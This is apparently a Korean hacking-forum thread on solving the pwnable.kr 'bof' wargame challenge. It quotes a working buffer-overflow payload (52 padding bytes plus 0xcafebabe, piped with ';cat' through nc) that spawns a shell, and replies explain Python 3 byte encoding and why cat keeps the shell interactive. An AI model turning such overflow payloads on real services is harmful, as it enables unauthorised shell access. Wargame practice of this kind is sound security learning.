시스템 해킹

1576,

1/79

hackxx123

http://NULL

pwnable.kr bof 문제!!!

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1950 [복사]

스택을 하나하나 손으로 그려보면서 왜 오버플로우가 발생하는지 깨우쳤습니다. 52바이트만큼 더미값을 넣어주고 마지막 4바이트에 원하는 키값을 넣어주면 풀리는 문제인데요,, 그런데,,,
페이로드는 (python -c "print('A'*52+'\xbe\xba\xfe\xca')";cat) | nc pwnable.kr 9000 정답이 이건데 python3로는 정답이 안풀립니다...
문법은 print앞에 ()를 넣고 당연히 해줬구요 도데체 이해가 안되네요.. 왜 python3로는 안되는건지 그리고 파이썬 명령을 해주고 마지막에 왜 ;cat 명령어를 붙혀주는지 모르겠습니다 ; 다음 cat이면 완전 분리된 명령 수행인걸로 아는데... 왜 저렇게 해주는지.. 인터넷에 나와있는 풀이를 봐도 모든글이 저 ;cat이 붙은 이유를 알려주지를 않네요.... 제발 누가 알려주세요 ㅠㅠ

Hit : 3274 Date : 2018/12/12 12:09


cd80	? ~ python2 -c 'print "\xbe\xba\xfe\xca"' \| xxd - 00000000: beba feca 0a ..... ? ~ python3 -c 'print("\xbe\xba\xfe\xca")' \| xxd - 00000000: c2be c2ba c3be c38a 0a ......... ? ~ 위 차이때문에 안되나보네요 cat을 붙여주는 이유는 cat을 그냥 실행해보면 ➜ ~ strace -if /bin/cat 2>&1 \| grep -E "read\|write" [00007f384b2b2da4] read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832 hi [00007f384afb5081] read(0, "hi\n", 131072) = 3 [00007f384afb5154] write(1, "hi\n", 3hi bye [00007f384afb5081] read(0, "bye\n", 131072) = 4 [00007f384afb5154] write(1, "bye\n", 4bye 입력한걸 그대로 출력하고 cat) 과 nc 사이의 파이프는 파이프 왼편의 stdout을 오른편의 stdin으로 넣어주는 역할이기 때문에 앞에서 출력한것이 bof의 gets에 들어가 쉘이 실행되고 그 후 명령을 치기 위해 cat을 붙여서 입력하는것들이 쉘로 전달될 수 있도록 하기위해 cat을 붙입니다	2018/12/12
DOP4MIN3	p_str = {출력 문자열}.decode('utf-8')	2018/12/23